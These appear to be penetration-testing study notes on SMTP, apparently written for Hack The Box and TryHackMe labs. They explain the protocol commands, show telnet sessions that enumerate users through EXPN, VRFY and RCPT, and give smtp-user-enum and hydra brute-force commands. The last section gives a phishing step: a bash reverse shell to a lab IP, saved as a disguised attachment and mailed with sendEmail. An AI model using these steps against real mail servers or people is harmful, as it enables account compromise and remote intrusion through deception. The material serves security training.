HELO
The SMTP (Simple Mail Transfer Protocol) HELO request is part of the SMTP protocol used for sending email messages. When a client (usually an email server) initiates a connection to another email server to deliver an email, the first step is the greeting phase. During this phase, the client sends a HELO (or EHLO) command to the receiving server.
It's important to note that some servers use the EHLO command instead of HELO. EHLO is an extended version of HELO and provides additional capabilities, such as supporting SMTP extensions like STARTTLS and authentication mechanisms. The usage of HELO or EHLO depends on the server's capabilities and the specific SMTP conversation between the client and server.
Shelled@htb[/htb]$ telnet 10.129.211.225 25
Trying 10.129.211.225...
Connected to 10.129.211.225.
Escape character is '^]'.
220 WIN-02 ESMTP
HELO x
250 Hello.
EXPN
The "EXPN" command was intended to be used to expand mailing lists. When an email server received an "EXPN" command, it would reveal the full list of email addresses belonging to a mailing list or alias. The idea was to allow senders to verify which email addresses were members of a specific list before sending a message.
Due to the security concerns and lack of use, modern SMTP servers have generally deprecated or disabled the "EXPN" command, and it's now considered an outdated and unsupported SMTP extension. If you encounter any references to "EXPN" in SMTP, it is essential to be aware of its history and lack of current support.
Shelled@htb[/htb]$ telnet 10.10.110.20 25
Trying 10.10.110.20...
Connected to 10.10.110.20.
Escape character is '^]'.
220 parrot ESMTP Postfix (Debian/GNU)
EXPN john
250 2.1.0 john@inlanefreight.htb
EXPN support-team
250 2.0.0 carol@inlanefreight.htb
250 2.1.5 elisa@inlanefreight.htb
VRFY
The "VRFY" command is used to verify the existence of an email address on the receiving mail server. When an SMTP client issues the "VRFY" command followed by an email address, the server responds with information about the validity of that address.
The "VRFY" command is often disabled or restricted on modern SMTP servers due to security and privacy concerns. In the past, it was a common target for email address harvesting by spammers, who used it to gather valid email addresses. To prevent abuse and protect user privacy, many SMTP servers now either disable or limit the functionality of the "VRFY" command. As a result, the "VRFY" command is rarely used in practice today.
Shelled@htb[/htb]$ telnet 10.10.110.20 25
Trying 10.10.110.20...
Connected to 10.10.110.20.
Escape character is '^]'.
220 parrot ESMTP Postfix (Debian/GNU)
VRFY root
252 2.0.0 root
VRFY www-data
252 2.0.0 www-data
VRFY new-user
550 5.1.1 <new-user>: Recipient address rejected: User unknown in local recipient table
RCPT
The "RCPT TO" command is used to specify the email address of the recipient(s) (also known as the envelope recipient(s) or forward path). This command tells the receiving mail server who should receive the email. The "RCPT TO" command can be used multiple times to specify multiple recipients. Note that some mail servers may want the email to be encased in angle brackets: RCPT TO:<josh@shelled.io>
Shelled@htb[/htb]$ telnet 10.10.110.20 25
Trying 10.10.110.20...
Connected to 10.10.110.20.
Escape character is '^]'.
220 parrot ESMTP Postfix (Debian/GNU)
MAIL FROM:test@htb.com
it is
250 2.1.0 test@htb.com... Sender ok
RCPT TO:julio
550 5.1.1 julio... User unknown
RCPT TO:kate
550 5.1.1 kate... User unknown
RCPT TO:john
250 2.1.5 john... Recipient ok
NOOP
The SMTP (Simple Mail Transfer Protocol) command "NOOP" stands for "No Operation." It is a command used to perform a null operation, meaning it doesn't have any real functionality other than keeping the connection alive and checking if the server is still responding.
The primary purpose of the NOOP command is to serve as a kind of "ping" or "heartbeat" between the client (email server or client) and the server (email server) during an SMTP session. When a client sends the NOOP command, the server will respond with a success code (usually 250 OK) to indicate that it has received the command successfully.
QUIT
The SMTP (Simple Mail Transfer Protocol) command "QUIT" is used to terminate an SMTP session gracefully. When a client (email server or client) sends the QUIT command to the SMTP server, it indicates that the client has finished sending email messages and wants to close the connection.
QUIT
221 goodbye
Connection closed by foreign host.
Username Enumeration
There are multiple tools that can be used to enumerate username of an SMTP server.
smtp-user-enum
smtp-user-enum -M RCPT -U users.list -D inlanefreight.htb -t 10.129.68.69
-M is for the "Mode". The options are RCPT, EXPN, or VRFY.
-U is for the list is usernames.
-D is for the domain
-t is for the target
Password Bruteforce
There are multiple tools that can be used to attack user's passwords of an SMTP server.
hydra
hydra -l 'marlin@inlanefreight.htb' -P pws.list 10.129.68.69 smtp
Phishing
We can send the target a malicious email and get a reverse shell back when they open it.
Reverse Shell as a Linux Application
echo 'bash -c "bash -i >& /dev/tcp/10.13.30.137/4444 0>&1"' > application
CLI: sendEmail
sendEmail -f shelled@test.com -t hakanbey@uranium.thm -a ./application -m "Hi" -s 10.10.23.23 -o tls=no